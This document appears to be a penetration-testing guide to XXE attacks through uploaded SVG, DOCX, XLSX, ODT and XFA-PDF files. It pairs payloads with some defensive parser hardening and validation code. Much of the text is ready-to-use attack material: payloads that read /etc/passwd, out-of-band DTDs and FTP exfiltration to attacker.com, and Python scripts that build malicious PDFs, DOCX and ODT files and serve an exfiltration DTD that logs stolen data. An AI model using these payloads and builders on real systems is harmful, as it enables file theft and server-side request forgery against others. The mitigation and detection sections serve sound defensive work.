XXE via file upload (CWE-611): external entity payloads inside SVG, DOCX, XLSX, or PDF processed server-side — file disclosure without modifying HTTP headers.
TL;DR
File upload XXE exploits applications that accept XML-based file formats and process them server-side with an unprotected XML parser. The attacker's payload is embedded inside the file itself — in SVG markup, inside an OOXML ZIP archive, within a PDF's XFA form data, or in an ODT document XML. The HTTP upload request looks identical to a benign file upload; all attack logic is contained in the file content.
This is one of the most prevalent XXE patterns in modern applications because file upload endpoints exist in virtually every web application: avatar uploaders, document management systems, spreadsheet importers, invoice processors, resume parsers, and content management systems. Each of these features potentially processes XML-based file formats with vulnerable parsers.
OWASP A05:2021 (Security Misconfiguration) applies because the vulnerability is a parser configuration failure: Apache POI, Apache Batik, Apache Tika, and LibreOffice all ship with external entity resolution enabled unless explicitly configured otherwise. CVE-2025-66516 (Apache Tika, CVSS 10.0) is the most recent critical example, introducing a new attack surface for PDF/XFA processing in document ingestion pipelines including AI-powered RAG systems.
The attack sequence for DOCX upload:
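1. Unpack a clean document: unzip clean.docx -d malicious/
2. Inject the XXE payload into word/document.xml (or customXml/item1.xml for the CVE-2025-21425 chain).
3. Repack: cd malicious && zip -r ../malicious.docx . && cd ..
4. Upload malicious.docx to the target application.
SVG payload (file read, reflected in rendered output):
<?xml version="1.0" standalone="yes"?>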
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg width="500" height="100" xmlns="http://www.w3.org/2000/svg">
<text x="10" y="50" font-size="14">&xxe;</text>
</svg>
If Apache Batik renders this SVG to PNG, the contents of /etc/passwd appear as text in the rendered image. Retrieve them by downloading the generated thumbnail and reading the rendered text. If the application never returns the rendered output, use the OOB variant instead.
OOB variant (no response reflection needed; %param1; is defined by exfil.dtd on the attacker server):
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY % sp SYSTEM "http://attacker.com/exfil.dtd">
%sp;
%param1;
]>
<svg xmlns="http://www.w3.org/2000/svg"><text>&exfil;</text></svg>
DOCX payload:
# Step 1: Unpack
unzip clean.docx -d malicious/
# Step 2: Inject into word/document.xml
Contents of malicious/word/document.xml:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://YOUR-TOKEN.oast.pro/docx-xxe">
]>
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas"
xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:body><w:p><w:r><w:t>&xxe;</w:t></w:r></w:p></w:body>
</w:document>
# Step 3: Repack
cd malicious && zip -r ../malicious.docx . && cd ..
For the CVE-2025-21425 chain (Office 2024+ hardened document.xml but not customXml):
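Contents of malicious/customXml/item1.xml:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
<root/>
The payload redefines the ISOamso parameter entity that docbookx.dtd expands. Internal-subset declarations take precedence, so the nested declarations run inside the external DTD, where parameter-entity references inside entity values are permitted; the resulting parser error leaks the file contents in the nonexistent path.
Apache Tika processes XFA (XML Forms Architecture) forms embedded in PDF files. Tika versions before 3.2.2 resolve external entities in that XFA content: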
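# Build a minimal PDF (plain Python, no reportlab) whose AcroForm carries an XFA stream with an OOB XXE payload
def create_xxe_pdf(output_path: str, oast_url: str) -> None:
    """Embed an XXE payload in the XFA form of a minimal, structurally valid PDF."""
    xfa = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "{oast_url}/tika-xfa-xxe">
%xxe;
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"><template><subform/></template></xdp:xdp>""".encode()
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /AcroForm 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        b"<< /Fields [] /XFA 5 0 R >>",  # /XFA may be a single stream
        b"<< /Length %d >>\nstream\n" % len(xfa) + xfa + b"\nendstream",
    ]
    out = bytearray(b"%PDF-1.7\n")
    offsets = []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))  # byte offset of "N 0 obj" for the xref table
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref_pos = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objects) + 1)
    out += b"".join(b"%010d 00000 n \n" % off for off in offsets)
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (len(objects) + 1, xref_pos)
    with open(output_path, "wb") as fh:
        fh.write(out)
Check the Tika version before exploitation: curl -s http://tika-server:9998/version (tika-server answers with a plain-text banner such as "Apache Tika 3.2.1", so there is nothing to pipe through jq).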
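The version check can also be scripted. The sketch below assumes the plain-text banner format "Apache Tika X.Y.Z" from tika-server's /version endpoint and treats 3.2.2, the fixed release named above, as the cut-off; parse_tika_version and is_vulnerable are hypothetical helper names.

```python
import re

FIXED = (3, 2, 2)  # first release treated as fixed for CVE-2025-66516 in this article


def parse_tika_version(banner: str) -> tuple[int, int, int]:
    """Extract (major, minor, patch) from a banner such as 'Apache Tika 3.2.1'."""
    match = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", banner)
    if match is None:
        raise ValueError(f"no version number found in {banner!r}")
    major, minor, patch = match.groups()
    return int(major), int(minor), int(patch or 0)


def is_vulnerable(banner: str) -> bool:
    """True when the reported version is older than the fixed release."""
    return parse_tika_version(banner) < FIXED


if __name__ == "__main__":
    for banner in ("Apache Tika 3.2.1", "Apache Tika 3.2.2", "Apache Tika 2.9"):
        print(banner, "->", "vulnerable" if is_vulnerable(banner) else "patched")
```

Tuple comparison handles the ordering, so a missing patch component (as in "2.9") is simply treated as 0.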
LibreOffice ODT payload (malicious/content.xml, packaged inside malicious.odt):
<?xml version="1.0" encoding="UTF-8"?>
<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
xmlns:xi="http://www.w3.org/2001/XInclude">
<office:body>
<office:text>
<!-- XInclude bypasses DOCTYPE filter in LibreOffice < 25.2.3 -->
<xi:include parse="text" href="file:///etc/passwd"/>
</office:text>
</office:body>
</office:document-content>
CVE-2025-66516 — Apache Tika PDF/XFA (CVSS 10.0)
Apache Tika is embedded in enterprise search products, SharePoint integrations, AI RAG pipelines, and document management systems. Any application that passes attacker-uploaded PDFs to Tika's PDF parsing (for example through AutoDetectParser or tika-server) on a version before 3.2.2 is vulnerable. The attack is especially impactful in automated document pipelines where PDFs are processed without human review.
CVE-2025-21425 — Microsoft Office OOXML Parser (CVSS 7.5)
Microsoft Office 2024 hardened word/document.xml against DOCTYPE-based XXE but left customXml/*.xml files processed by a separate unprotected code path. Patched in January 2025 Patch Tuesday. The attack requires no macros — opening the DOCX triggers automatic processing.
CVE-2025-31200 — LibreOffice ODT XInclude (CVSS 7.1)
LibreOffice blocked DOCTYPE-based XXE but did not disable XInclude processing. An ODT file with xi:include href="file:///etc/passwd" discloses the file when the document is opened or converted. Patched in LibreOffice 25.2.3 and 24.8.7.
HackerOne #1113539 — Rockstar Games XLSX Import (High)
The researcher modified a spreadsheet template to include XXE payloads in the OOXML XML files inside the ZIP. The server-side XLSX processor (Apache POI) resolved the entities and made OOB callbacks. This is representative of the most common file upload XXE vector: server-side document processing for import/export features.
Identify file upload endpoints that process XML-based formats: avatar upload (SVG), document import (DOCX/XLSX), invoice processing (PDF), template upload (ODT).
Craft a benign test file and upload. Check that the endpoint accepts the format.
Inject an OOB XXE canary into the file's XML:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://YOUR-TOKEN.oast.pro/file-upload-xxe"> %xxe;]>
Monitor Interactsh for callbacks after upload.
Use OXML_XXE to generate test files. It is a Ruby web application rather than a packaged command-line tool; run it from a clone of github.com/BuffaloWill/oxml_xxe:
bundle install
ruby server.rb
# Then build a DOCX whose OOB payload points at http://YOUR-TOKEN.oast.pro/ in the browser interface
For SVG: submit via every upload endpoint that accepts images, especially avatars and content thumbnails.
OXML_XXE automates payload generation for DOCX, XLSX, PPTX, SVG, and ODT. Combined with an Interactsh token, it provides reliable OOB detection.
Nuclei templates cover CVE-specific file upload XXE (Tika CVE-2025-66516 template available in community templates).
BreachVex tests file-upload endpoints by generating malicious SVG, DOCX, and XLSX files with unique out-of-band callback tokens per content type, then watches for callbacks after each upload and correlates by token.
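The token-per-upload approach can be sketched in a few lines. This is not BreachVex's implementation; it assumes an out-of-band DNS/HTTP service that records arbitrary sub-labels under a domain you control (oob.example.com is a placeholder), and UploadProbe, new_probe, callback_url, and correlate are hypothetical names.

```python
import secrets
from dataclasses import dataclass

OOB_DOMAIN = "oob.example.com"  # placeholder: a zone whose DNS/HTTP hits you can read


@dataclass(frozen=True)
class UploadProbe:
    endpoint: str      # e.g. "/api/avatar"
    content_type: str  # e.g. "svg", "docx", "xlsx"
    token: str         # random label unique to this (endpoint, content type) pair


def new_probe(endpoint: str, content_type: str) -> UploadProbe:
    """Mint a fresh 16-hex-character token for one upload."""
    return UploadProbe(endpoint, content_type, secrets.token_hex(8))


def callback_url(probe: UploadProbe) -> str:
    """URL to place in the payload's SYSTEM identifier."""
    return f"http://{probe.token}.{OOB_DOMAIN}/{probe.content_type}-xxe"


def correlate(probes: list[UploadProbe], callback_hosts: list[str]) -> list[UploadProbe]:
    """Map observed callback hostnames back to the uploads that caused them."""
    by_token = {p.token: p for p in probes}
    hits: list[UploadProbe] = []
    for host in callback_hosts:
        probe = by_token.get(host.split(".", 1)[0].lower())
        if probe is not None and probe not in hits:
            hits.append(probe)
    return hits
```

Because every (endpoint, content type) pair gets its own label, a single DNS hit is enough to say which upload path and which parser resolved the entity.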
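# Python: validate file contents before processing
import io
import re
import zipfile
# DOCTYPE/ENTITY declarations plus the XInclude namespace (see the XInclude note below)
SUSPICIOUS = re.compile(r'<!DOCTYPE|<!ENTITY|http://www\.w3\.org/2001/XInclude', re.IGNORECASE)
def validate_ooxml(file_bytes: bytes) -> None:
    """Scan an OOXML/ODF ZIP for DOCTYPE, ENTITY, or XInclude markup before processing."""
    # ZipFile needs a path or file-like object, not raw bytes
    with zipfile.ZipFile(io.BytesIO(file_bytes)) as zf:
        for name in zf.namelist():
            if name.endswith(('.xml', '.rels')):
                raw = zf.read(name)
                # Honour a UTF-16 BOM so the markup cannot hide behind a different encoding
                encoding = 'utf-16' if raw.startswith((b'\xff\xfe', b'\xfe\xff')) else 'utf-8'
                content = raw.decode(encoding, errors='replace')
                if SUSPICIOUS.search(content):
                    raise ValueError(f"DOCTYPE/ENTITY/XInclude detected in {name}: rejected")
// Apache POI: use the SAX event model with a hardened parser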
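import javax.xml.parsers.SAXParserFactory;
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);  // reject any DOCTYPE outright
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
spf.setXIncludeAware(false);  // XInclude is controlled separately from DOCTYPE handling
// For Apache Tika: upgrade to >= 3.2.2 (CVE-2025-66516 patched)
// Tika 3.2.2 disables entity resolution in the XFA parser by default
<!-- Apache Tika: tika-config.xml to disable entity resolution -->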
<properties>
<parsers>
<parser class="org.apache.tika.parser.xml.XMLParser">
<params>
<param name="parseXMLInSecurity" type="boolean">true</param>
</params>
</parser>
</parsers>
</properties>
Rejecting files containing <!DOCTYPE patterns is not sufficient for LibreOffice ODT files. CVE-2025-31200 uses XInclude (xi:include), which does not use DOCTYPE. Scan for both <!DOCTYPE and xmlns:xi="http://www.w3.org/2001/XInclude" patterns, and disable XInclude at the parser level separately.
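One way to enforce both checks at the parser level rather than with regular expressions is to let the XML parser itself refuse the constructs. A minimal sketch using Python's bundled expat bindings (xml.parsers.expat): any DOCTYPE aborts the parse, as does any element in the XInclude namespace. Because expat decodes the document's declared encoding itself, a UTF-16 payload cannot slip past it the way it can slip past a byte-level regex. UnsafeXML and check_xml_part are hypothetical names.

```python
import xml.parsers.expat

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


class UnsafeXML(ValueError):
    """Raised when an uploaded XML part contains a DOCTYPE or an XInclude element."""


def check_xml_part(data: bytes) -> None:
    """Parse one XML part with expat and abort on DOCTYPE or XInclude."""
    # namespace_separator makes element names arrive as "namespace-URI localname"
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE {name!r} is not allowed")

    def reject_xinclude(name, attrs):
        if name.startswith(XINCLUDE_NS + " "):
            raise UnsafeXML(f"XInclude element {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.StartElementHandler = reject_xinclude
    # expat never fetches external entities on its own (it only reports them to an
    # ExternalEntityRefHandler, left unset here) and has no XInclude processing.
    parser.Parse(data, True)
```

Run it on every XML part of an upload (each .xml/.rels entry in an OOXML or ODF ZIP, or the SVG itself) before the bytes reach POI, Batik, Tika, or LibreOffice.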
Any file format based on XML is potentially vulnerable: SVG (Scalable Vector Graphics), DOCX/XLSX/PPTX (OOXML — ZIP archives containing XML files), ODT/ODS (LibreOffice OpenDocument — also ZIP+XML), PDF with XFA forms (Adobe's XML-based form format), EPUB, and SAML assertions. The attack requires the application to process the uploaded file with an XML parser that has not disabled external entity resolution.
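Before deciding which parser hardening applies, it helps to know which uploads carry XML at all. A best-effort triage sketch, assuming magic-byte checks (PK\x03\x04 for ZIP, %PDF for PDF) plus the presence of [Content_Types].xml (OOXML) or a mimetype entry (ODF/EPUB) are good enough for routing; xml_bearing_format and its return labels are hypothetical. Anything it flags should take the hardened path; a None result is not proof of safety.

```python
import io
import zipfile
from typing import Optional


def xml_bearing_format(data: bytes) -> Optional[str]:
    """Best-effort guess at which XML-based format an upload carries, else None."""
    if data.startswith(b"%PDF"):
        # /XFA can sit inside compressed object streams, so a miss here is not proof of
        # absence; every PDF is still reported so it can take the hardened path.
        return "pdf-xfa" if b"/XFA" in data else "pdf"
    if data.startswith(b"PK\x03\x04"):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                names = set(zf.namelist())
        except zipfile.BadZipFile:
            return None
        if "[Content_Types].xml" in names:
            return "ooxml"        # DOCX, XLSX, PPTX
        if "mimetype" in names:
            return "odf-or-epub"  # ODT/ODS and EPUB both carry a mimetype entry
        return None
    head = data[:1024].lstrip()
    if head.startswith(b"<?xml") or b"<svg" in head:
        return "xml-or-svg"
    return None
```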
OOXML formats (DOCX, XLSX, PPTX) are ZIP archives containing XML files. The main document content is in word/document.xml (DOCX) or xl/worksheets/sheet1.xml (XLSX). Apache POI processes these XML files with a SAX or DOM parser. If that parser has entity resolution enabled, injecting <!DOCTYPE> and <!ENTITY> declarations into any of the XML files inside the ZIP triggers XXE when the file is processed server-side. CVE-2025-21425 targets the customXml/item1.xml component specifically.
Apache Batik (versions < 1.14) renders SVG files server-side and processes external entities by default. Apache Batik is used in many Java enterprise applications for SVG-to-PNG/PDF conversion. ImageMagick's SVG handler (via Inkscape delegate) has historical XXE vulnerabilities. Any server-side SVG renderer that does not explicitly disable external entity processing is vulnerable.
Microsoft Office 2024+ hardened the word/document.xml parser but left customXml/*.xml files unprotected. CVE-2025-21425 (CVSS 7.5, January 2025 Patch Tuesday) exploits this: a malicious DOCX contains an XXE payload in customXml/item1.xml rather than word/document.xml. The Office parser processes customXml files with the old unprotected parser. When the victim opens the DOCX, the customXml XML triggers file disclosure (local DTD reuse pattern). No macro required.
Apache Tika (< 3.2.2) processes PDF documents that embed XFA (XML Forms Architecture) forms. XFA is XML inside PDF. When Tika encounters an XFA section, it parses it with an XML parser that had external entity resolution enabled by default. A malicious PDF with an XFA form containing XXE payloads triggers arbitrary file read or SSRF when processed by any application using Tika for document ingestion. CVSS 10.0 — unauthenticated, network-reachable in many deployments.
1. Start with a clean DOCX file.
2. Unzip it: unzip clean.docx -d malicious/
3. Edit malicious/word/document.xml (or malicious/customXml/item1.xml for the CVE-2025-21425 chain): add <!DOCTYPE> and <!ENTITY xxe SYSTEM 'http://CANARY.oast.pro/'> declarations and embed &xxe; in the document body.
4. Rezip: cd malicious && zip -r ../malicious.docx . && cd ..
5. Upload to the target application. The server processes the DOCX and resolves the external entity.
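The unzip, edit, and rezip steps can be automated with Python's zipfile module. A minimal sketch under stated assumptions: inject_xxe is a hypothetical helper, and it uses a parameter-entity canary (<!ENTITY % xxe ...> %xxe;) instead of the &xxe; body reference from step 3, because a parameter entity fires while the DTD is processed no matter which part it is placed in, which also covers customXml/item1.xml.

```python
import io
import re
import zipfile


def inject_xxe(docx: bytes, canary_url: str, part: str = "word/document.xml") -> bytes:
    """Return a copy of an OOXML archive with an OOB XXE DOCTYPE added to one XML part."""
    # The parameter entity is referenced inside the DTD itself, so no &xxe;
    # reference in the document body is needed for the callback to fire.
    doctype = f'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "{canary_url}"> %xxe;]>\n'
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx)) as src, zipfile.ZipFile(out, "w") as dst:
        if part not in src.namelist():
            raise KeyError(f"{part} not found in archive")
        for item in src.infolist():  # keep the original entry order and metadata
            data = src.read(item.filename)
            if item.filename == part:
                xml = data.decode("utf-8-sig")  # strip a UTF-8 BOM if present
                # The DOCTYPE must sit after the XML declaration and before the root element
                decl = re.match(r"\s*<\?xml[^>]*\?>\s*", xml)
                split = decl.end() if decl else 0
                data = (xml[:split] + doctype + xml[split:]).encode("utf-8")
            dst.writestr(item, data)
    return out.getvalue()
```

Usage: Path("malicious.docx").write_bytes(inject_xxe(Path("clean.docx").read_bytes(), "http://CANARY.oast.pro/")) with pathlib's Path, or pass part="customXml/item1.xml" for the CVE-2025-21425 chain.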
Avatar upload endpoints often accept SVG files to support vector graphics profiles. If the server renders the SVG to PNG/JPEG (for display) or extracts metadata using a library like Apache Batik, the SVG XML is processed. An attacker uploads a malicious SVG: <?xml version='1.0' standalone='yes'?><!DOCTYPE svg [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><svg><text>&xxe;</text></svg>. Apache Batik resolves the entity and may include the file content in the rendered image output or error message.
XInclude offers a route that needs no DOCTYPE at all: CVE-2025-31200 (CVSS 7.1) demonstrates XInclude-based file disclosure in LibreOffice ODT files. ODT is an OpenDocument format based on ZIP+XML. LibreOffice rejected DOCTYPE-based XXE but processed XInclude instructions, allowing xi:include href='file:///etc/passwd' to be embedded in the document XML. File content is included when LibreOffice opens or converts the file. Patched in LibreOffice 25.2.3 and 24.8.7.
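Building such an ODT by hand mostly comes down to ODF packaging rules: the mimetype entry must be the first file in the ZIP and stored uncompressed. A sketch, assuming a minimal META-INF/manifest.xml is enough for the target to accept the package and reusing the shape of the content.xml payload shown earlier; build_odt and its target parameter are hypothetical.

```python
import io
import zipfile

MIMETYPE = "application/vnd.oasis.opendocument.text"

MANIFEST = """<?xml version="1.0" encoding="UTF-8"?>
<manifest:manifest xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0" manifest:version="1.2">
 <manifest:file-entry manifest:full-path="/" manifest:media-type="application/vnd.oasis.opendocument.text"/>
 <manifest:file-entry manifest:full-path="content.xml" manifest:media-type="text/xml"/>
</manifest:manifest>
"""

CONTENT = """<?xml version="1.0" encoding="UTF-8"?>
<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
 xmlns:xi="http://www.w3.org/2001/XInclude" office:version="1.2">
<office:body><office:text>
<xi:include parse="text" href="{target}"/>
</office:text></office:body>
</office:document-content>
"""


def build_odt(target: str = "file:///etc/passwd") -> bytes:
    """Package a minimal ODT whose content.xml XIncludes `target` as text."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        # ODF packaging rule: "mimetype" is the first entry and is stored uncompressed
        zf.writestr("mimetype", MIMETYPE, compress_type=zipfile.ZIP_STORED)
        zf.writestr("META-INF/manifest.xml", MANIFEST)
        zf.writestr("content.xml", CONTENT.format(target=target))
    return buf.getvalue()
```

Unlike the DOCX workflow, a plain `zip -r` of the directory can place mimetype elsewhere or compress it, which is why the entry order is set explicitly here.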
OXML_XXE (github.com/BuffaloWill/oxml_xxe) is a dedicated tool for generating malicious DOCX, XLSX, PPTX, ODT, and SVG files with configurable XXE payloads. It handles the ZIP unpacking, XML injection, and repacking automatically. xxeftp runs an FTP listener that captures FTP-based OOB exfiltration. For manual crafting, unzip + edit XML + rezip is sufficient. For PDF/XFA, use specialized tools or Python's reportlab with XFA injection.
When OOXML XXE targets Java-based document processors (Apache POI on Java), the FTP exfiltration technique works: the entity references ftp://attacker.com:2121/%file; where %file; expands to the target file content. Java's FTP client then sends that content to the attacker's server inside the commands it issues for the URL path (such as CWD and RETR), which the xxeftp tool captures. This technique is more reliable than HTTP for Java-based document processors because file contents containing newlines survive an FTP path better than HTTP URL parameters.
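The external DTD behind these OOB techniques (the exfil.dtd that the SVG OOB variant loads and expands via %param1;) follows a common pattern: one parameter entity reads the file, and a second declares a general entity whose URL embeds it. A sketch, assuming the uploaded document references &exfil; in its body; the function names, entity names, and collector URLs are placeholders. Capturing FTP commands still needs a listener such as xxeftp; the handler below only covers HTTP.

```python
from http.server import BaseHTTPRequestHandler


def exfil_dtd(file_path: str, collector: str) -> str:
    """External DTD: %data reads file_path, %param1 declares &exfil; pointing at collector + data.

    collector is a URL prefix such as "http://attacker.com/?d=" or "ftp://attacker.com:2121/".
    A single quote in the file contents breaks the generated declaration.
    """
    return (
        f'<!ENTITY % data SYSTEM "file://{file_path}">\n'
        f'<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'{collector}%data;\'>">\n'
    )


def make_handler(dtd: str) -> type:
    """HTTP handler that serves the DTD for any path and logs each request path."""

    class DTDHandler(BaseHTTPRequestHandler):
        def do_GET(self) -> None:
            # With an http:// collector, the exfiltrated data arrives in self.path
            print("callback:", self.path)
            body = dtd.encode("utf-8")
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    return DTDHandler
```

For example, HTTPServer(("0.0.0.0", 8000), make_handler(exfil_dtd("/etc/passwd", "ftp://attacker.com:2121/"))).serve_forever() (with HTTPServer from http.server) serves the DTD and logs every request path.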
Use a low-noise approach:
1. Upload a valid SVG/DOCX with no XXE payload to confirm acceptance.
2. Add an internal entity canary (no external fetch): <!ENTITY test 'XXECANARY'>, and reference &test; in the document content.
3. If the canary is reflected in any response (thumbnail URL, metadata API, processed output), entity expansion is confirmed.
4. Escalate to OOB: add a SYSTEM entity with an Interactsh token. This makes one outbound DNS/HTTP request.
5. Only attempt file read if OOB confirms the parser is vulnerable.
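Steps 2 and 3 can be sketched as a payload builder plus a reflection check. The heuristic in expansion_confirmed is an assumption: it counts the canary as proof of expansion only when the entity declaration itself is absent from the response, so a server that merely echoes the uploaded file back is not counted. canary_svg and expansion_confirmed are hypothetical names.

```python
CANARY = "XXECANARY"


def canary_svg(canary: str = CANARY) -> str:
    """SVG that declares and uses an internal entity: expansion only, no external fetch."""
    return (
        '<?xml version="1.0" standalone="yes"?>\n'
        f'<!DOCTYPE svg [<!ENTITY test "{canary}">]>\n'
        '<svg xmlns="http://www.w3.org/2000/svg" width="300" height="40">'
        '<text x="10" y="25">&test;</text></svg>\n'
    )


def expansion_confirmed(response_text: str, canary: str = CANARY) -> bool:
    """Heuristic: the canary came back but the entity declaration did not.

    A response that echoes the uploaded file verbatim contains both, which shows
    storage rather than expansion, so it is not counted.
    """
    return canary in response_text and "<!ENTITY test" not in response_text
```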